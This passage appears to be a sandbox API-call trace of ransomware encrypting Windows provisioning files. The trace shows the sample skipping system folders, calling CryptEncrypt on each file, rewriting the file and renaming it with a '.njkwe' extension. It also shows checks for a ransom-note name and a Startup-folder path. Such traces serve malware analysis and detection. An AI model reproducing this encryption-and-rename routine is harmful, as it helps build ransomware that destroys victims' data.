[0077.841] GetProcessHeap () returned 0xbe0000 [0077.841] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.841] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a2df51, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a2df51, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a2df51, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x357, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml", cAlternateFileName="273__C~1.PRO")) returned 1 [0077.841] lstrcmpiW (lpString1="273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.841] lstrcmpiW (lpString1="273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.841] lstrcmpiW (lpString1="273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.841] lstrcmpiW (lpString1="273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.841] lstrcmpiW (lpString1="273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.841] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml") returned 175 [0077.842] StrStrIW (lpFirst="273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.842] lstrcmpW (lpString1="273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.842] lstrcmpW (lpString1="273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.842] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\273__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.842] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\273__connections_cellular_crnogorski telekom (montenegro)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.842] GetTickCount () returned 0x1153cb7 [0077.842] GetTickCount () returned 0x1153cb7 [0077.842] GetTickCount () returned 0x1153cb7 [0077.842] GetTickCount () returned 0x1153cb7 [0077.842] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.842] GetProcessHeap () returned 0xbe0000 [0077.842] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.842] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x357, lpOverlapped=0x0) returned 1 [0077.846] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.846] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x357, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x357, lpOverlapped=0x0) returned 1 [0077.846] GetProcessHeap () returned 0xbe0000 [0077.846] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.846] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.846] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.846] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.846] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.846] CloseHandle (hObject=0x43c) returned 1 [0077.846] GetProcessHeap () returned 0xbe0000 [0077.846] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.847] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 195 [0077.847] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\273__connections_cellular_crnogorski telekom (montenegro)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\273__Connections_Cellular_Crnogorski Telekom (Montenegro)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\273__connections_cellular_crnogorski telekom (montenegro)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.847] GetProcessHeap () returned 0xbe0000 [0077.847] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.847] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a541c1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a541c1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a541c1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml", cAlternateFileName="274__C~1.PRO")) returned 1 [0077.847] lstrcmpiW (lpString1="274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.848] lstrcmpiW (lpString1="274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.848] lstrcmpiW (lpString1="274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.848] lstrcmpiW (lpString1="274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.848] lstrcmpiW (lpString1="274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.848] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml") returned 167 [0077.848] StrStrIW (lpFirst="274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.848] lstrcmpW (lpString1="274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.848] lstrcmpW (lpString1="274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.848] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\274__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.848] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\274__connections_cellular_maroc telecom (morocco)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.848] GetTickCount () returned 0x1153cb7 [0077.848] GetTickCount () returned 0x1153cb7 [0077.848] GetTickCount () returned 0x1153cb7 [0077.848] GetTickCount () returned 0x1153cb7 [0077.848] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.848] GetProcessHeap () returned 0xbe0000 [0077.848] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.848] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0077.850] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.850] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0077.850] GetProcessHeap () returned 0xbe0000 [0077.850] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.850] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.850] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.850] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.850] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.850] CloseHandle (hObject=0x43c) returned 1 [0077.850] GetProcessHeap () returned 0xbe0000 [0077.850] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.851] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 187 [0077.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\274__connections_cellular_maroc telecom (morocco)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\274__Connections_Cellular_Maroc Telecom (Morocco)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\274__connections_cellular_maroc telecom (morocco)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.851] GetProcessHeap () returned 0xbe0000 [0077.851] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.851] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a541c1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a541c1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a541c1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2da, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml", cAlternateFileName="275__C~1.PRO")) returned 1 [0077.851] lstrcmpiW (lpString1="275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.851] lstrcmpiW (lpString1="275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.851] lstrcmpiW (lpString1="275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.851] lstrcmpiW (lpString1="275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.851] lstrcmpiW (lpString1="275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.851] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml") returned 175 [0077.851] StrStrIW (lpFirst="275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.851] lstrcmpW (lpString1="275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.851] lstrcmpW (lpString1="275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.852] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\275__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.852] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\275__connections_cellular_vodacom mozambique (mozambique)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.852] GetTickCount () returned 0x1153cb7 [0077.852] GetTickCount () returned 0x1153cb7 [0077.852] GetTickCount () returned 0x1153cb7 [0077.852] GetTickCount () returned 0x1153cb7 [0077.852] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.852] GetProcessHeap () returned 0xbe0000 [0077.852] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.852] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0077.854] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.854] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2da, lpOverlapped=0x0) returned 1 [0077.854] GetProcessHeap () returned 0xbe0000 [0077.854] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.854] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.854] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.854] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.854] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.854] CloseHandle (hObject=0x43c) returned 1 [0077.854] GetProcessHeap () returned 0xbe0000 [0077.854] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.854] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 195 [0077.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\275__connections_cellular_vodacom mozambique (mozambique)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\275__Connections_Cellular_Vodacom Mozambique (Mozambique)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\275__connections_cellular_vodacom mozambique (mozambique)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.855] GetProcessHeap () returned 0xbe0000 [0077.855] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.855] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90a7a428, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90a7a428, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90a7a428, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml", cAlternateFileName="276__C~1.PRO")) returned 1 [0077.855] lstrcmpiW (lpString1="276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.855] lstrcmpiW (lpString1="276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.855] lstrcmpiW (lpString1="276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.855] lstrcmpiW (lpString1="276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.855] lstrcmpiW (lpString1="276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.855] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml") returned 164 [0077.855] StrStrIW (lpFirst="276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.855] lstrcmpW (lpString1="276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.855] lstrcmpW (lpString1="276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.855] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\276__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.855] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\276__Connections_Cellular_KPN-Hi (Netherlands)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\276__connections_cellular_kpn-hi (netherlands)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.856] GetTickCount () returned 0x1153cb7 [0077.856] GetTickCount () returned 0x1153cb7 [0077.856] GetTickCount () returned 0x1153cb7 [0077.856] GetTickCount () returned 0x1153cc7 [0077.856] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.856] GetProcessHeap () returned 0xbe0000 [0077.856] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.856] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0077.857] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.858] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0077.858] GetProcessHeap () returned 0xbe0000 [0077.858] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.858] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.858] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.858] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, 